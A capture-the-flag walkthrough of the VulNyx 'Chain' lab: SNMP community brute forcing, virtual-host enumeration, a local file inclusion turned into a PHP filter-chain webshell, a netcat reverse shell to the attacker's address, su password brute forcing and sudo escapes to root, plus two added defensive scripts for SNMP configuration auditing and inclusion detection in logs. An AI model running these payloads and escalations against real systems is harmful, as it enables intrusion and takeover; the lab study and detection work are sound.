# Lab setup
Download: Chain
NAT, IP: 192.168.1.161
# Penetration process
# Initial information gathering
```
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.56 ((Debian))
|_http-title: Chain
|_http-server-header: Apache/2.4.56 (Debian)
MAC Address: 00:0C:29:37:BE:9A (VMware)
```
Port 80 opens with nothing but an image. Running strings on it yields an SSH private key, but with no username to go with it, and running it through metasploit got nowhere.
```
┌──(root㉿kali)-[~]
└─# nmap -sU 192.168.1.161 --top-ports 100
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-28 04:36 EDT
Nmap scan report for 192.168.1.161
Host is up (0.00046s latency).
Not shown: 59 closed udp ports (port-unreach), 40 open|filtered udp ports (no-response)
PORT    STATE SERVICE
161/udp open  snmp
MAC Address: 00:0C:29:37:BE:9A (VMware)
```
Use onesixtyone to enumerate the community string.
The community string is the shared credential between the SNMP management system and the managed device; it is what ensures that only authenticated and authorized users can query and manage the device. If the community string leaks or is poorly chosen, the device is exposed to unauthorized access and control.
```
┌──(root㉿kali)-[~]
└─# onesixtyone -c /usr/share/wordlists/seclists/Discovery/SNMP/snmp.txt 192.168.1.161
Scanning 1 hosts, 3219 communities
192.168.1.161 [security] Linux chain 5.10.0-23-amd64 #1 SMP Debian 5.10.179-1 (2023-05-12) x86_64
```
Now pull the SNMP information with that community string.
```
┌──(root㉿kali)-[~]
└─# snmp-check -v 2c -c security 192.168.1.161
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)

[+] Try to connect to 192.168.1.161:161 using SNMPv2c and community 'security'

[*] System information:

  Host IP address               : 192.168.1.161
  Hostname                      : Chain
  Description                   : Linux chain 5.10.0-23-amd64 #1 SMP Debian 5.10.179-1 (2023-05-12) x86_64
  Contact                       : Blue <[email protected]>
  Location                      : VulNyx.com
  Uptime snmp                   : 00:19:16.57
  Uptime system                 : 00:19:11.60
  System date                   : 2024-5-28 10:46:41.0

[*] Network information:

  Default TTL                   : noSuchObject
  TCP segments received         : noSuchObject
  TCP segments sent             : noSuchObject
  TCP segments retrans          : noSuchObject
  Input datagrams               : noSuchObject
  Delivered datagrams           : noSuchObject
  Output datagrams              : noSuchObject

[*] File system information:

  Index                         : noSuchObject
  Mount point                   : noSuchObject
  Access                        : noSuchObject
  Bootable                      : noSuchObject
```
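The weakness enumerated above is a guessable v1/v2c community that hands out hostname, kernel version, contact and location to anyone who can reach UDP/161. The following audit script is an added example, not part of the original write-up: it checks an snmpd.conf (constructed text, net-snmp directive syntax) for guessable communities, write access over cleartext v1/v2c, unrestricted sources and SNMPv3 users configured without authentication.

```python
"""Audit an snmpd.conf for the exposure found on this box: a guessable
SNMPv1/v2c read community ('security') reachable from any host.
Added example, not from the original write-up; config text is constructed."""
import re

# Strings present in every SNMP wordlist (seclists' snmp.txt included);
# 'security' is the one onesixtyone found on this target.
WEAK_COMMUNITIES = {"public", "private", "security", "manager", "snmp",
                    "community", "admin", "default", "cisco", "guest"}

# rocommunity/rwcommunity COMMUNITY [SOURCE [...]]: every such line is v1/v2c,
# so the community string travels in cleartext and is the only credential.
COMMUNITY_RE = re.compile(r"^\s*(r[ow]community6?)\s+(\S+)(?:\s+(\S+))?", re.M)
# rouser/rwuser USER noauth: an SNMPv3 user that skips authentication entirely.
V3_NOAUTH_RE = re.compile(r"^\s*r[ow]user\s+\S+\s+noauth\b", re.M)

def audit_snmpd_conf(text):
    """Return (directive line, severity, reason) tuples for risky settings."""
    findings = []
    for m in COMMUNITY_RE.finditer(text):
        directive, community, source = m.group(1), m.group(2), m.group(3)
        line = m.group(0).strip()
        if community.lower() in WEAK_COMMUNITIES:
            findings.append((line, "high", f"guessable community '{community}'"))
        if directive.startswith("rw"):
            findings.append((line, "high", "write access over cleartext v1/v2c"))
        if source is None or source == "default":
            findings.append((line, "medium", "no source restriction: any host may query"))
    for m in V3_NOAUTH_RE.finditer(text):
        findings.append((m.group(0).strip(), "medium", "SNMPv3 user without authentication"))
    return findings

# Constructed: a config that leaks the way this box does.
WEAK_CONF = """\
rocommunity security default
rwcommunity private 10.0.0.0/8
sysLocation VulNyx.com
"""

# Constructed hardened equivalent: SNMPv3 only, authentication and privacy required.
HARDENED_CONF = """\
rouser monitoring priv
sysLocation VulNyx.com
"""

if __name__ == "__main__":
    for line, sev, why in audit_snmpd_conf(WEAK_CONF):
        print(f"[{sev}] {line}: {why}")
```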
That gives us the domain name. Add it to the hosts file and enumerate subdomains.
```
┌──(root㉿kali)-[~]
└─# gobuster vhost -u chaincorp.nyx -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:             http://chaincorp.nyx
[+] Method:          GET
[+] Threads:         10
[+] Wordlist:        /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent:      gobuster/3.6
[+] Timeout:         10s
[+] Append Domain:   true
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
Found: utils.chaincorp.nyx Status: 200 [Size: 628]
Progress: 114441 / 114442 (100.00%)
===============================================================
Finished
===============================================================
```
Or:
```
┌──(root㉿kali)-[~]
└─# wfuzz -t 100 -c --hl=11 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.chaincorp.nyx" "http://chaincorp.nyx"
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://chaincorp.nyx/
Total requests: 114441

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000009532:   400        10 L     35 W       301 Ch      "#www"
000010581:   400        10 L     35 W       301 Ch      "#mail"
000012080:   200        20 L     37 W       628 Ch      "utils"
```
Subdomain found: utils.chaincorp.nyx
Visiting it, there is a blatant file inclusion: http://utils.chaincorp.nyx/include.php?in=/etc/passwd
Use php_filter_chain_generator to build a chain of PHP filters; this gives a shell without needing a file upload.
Project: php_filter_chain_generator
```
┌──(root㉿kali)-[~/Desktop/php_filter_chain_generator-main]
└─# python3 php_filter_chain_generator.py --chain '<?php system($_GET["cmd"]); ?>'
[+] The following gadget chain will generate the following code : <?php system($_GET["cmd"]); ?> (base64 value: PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8+)
```
Append the cmd parameter to the end of the URL to get a reverse shell: &cmd=nc%20-c%20/bin/bash%20192.168.1.129%204444
We have a shell.
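Detection logic for the inclusion pattern above, as an added example that is not from the write-up: it parses constructed Apache access-log lines and flags the absolute path to /etc/passwd, the php://filter gadget chain (convert.iconv / convert.base64 filters, resource=php://temp) and the cmd= parameter riding on the include. On the application side the fix is an allow-list of includable page names; this script only surfaces the abuse in the logs.

```python
"""Flag the include.php abuse seen in this write-up in Apache access logs:
traversal to /etc/passwd, php://filter chains and a cmd= parameter on the
include request. Added example, not from the original post; log lines are
constructed (attacker address follows the write-up's 192.168.1.129)."""
import re
from urllib.parse import urlsplit, parse_qs

# Combined-log-format prefix: client, ident, user, timestamp, request, status.
REQ_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

# Constructed sample lines; the filter chain is shortened to a few gadgets.
SAMPLE_LOG = """\
192.168.1.129 - - [28/May/2024:10:50:01 +0000] "GET /include.php?in=/etc/passwd HTTP/1.1" 200 1734
192.168.1.129 - - [28/May/2024:10:51:12 +0000] "GET /include.php?in=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.base64-decode/resource=php://temp&cmd=id HTTP/1.1" 200 88
10.0.0.5 - - [28/May/2024:10:52:00 +0000] "GET /include.php?in=about.php HTTP/1.1" 200 628
10.0.0.7 - - [28/May/2024:10:53:00 +0000] "GET /index.php HTTP/1.1" 200 412
"""

def classify_request(path, include_param="in"):
    """Return the reasons a request looks like file-inclusion abuse ([] if clean)."""
    reasons = []
    params = parse_qs(urlsplit(path).query, keep_blank_values=True)  # percent-decodes values
    for raw in params.get(include_param, []):
        val = raw.lower()
        if val.startswith(("php://", "data:", "expect://", "phar://")):
            reasons.append("stream wrapper in include parameter")
        if "convert.iconv" in val or "convert.base64" in val:
            reasons.append("php filter chain")
        if "../" in val or val.startswith("/"):
            reasons.append("absolute path or traversal")
    if include_param in params and "cmd" in params:
        reasons.append("command parameter alongside include")
    return reasons

def scan_log(text):
    """Return (client_ip, request_path, reasons) for every suspicious line."""
    hits = []
    for line in text.splitlines():
        m = REQ_RE.match(line)
        if not m:
            continue
        reasons = classify_request(m.group(2))
        if reasons:
            hits.append((m.group(1), m.group(2), reasons))
    return hits

if __name__ == "__main__":
    for ip, path, why in scan_log(SAMPLE_LOG):
        print(ip, path[:60], why)
```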
# Privilege escalation
From the earlier inclusion of passwd we already know two users: blue and red.
Use suforce to brute-force the password: ./suforce.sh -u blue -w probable-v2-top12000.txt
Password found: skyblue
sudo -u red cpulimit -l 100 -f /bin/bash
That gives a shell as red.
sudo /usr/sbin/smokeping --man
Then press Enter a few times until the : prompt appears, and enter !/bin/bash
Root obtained.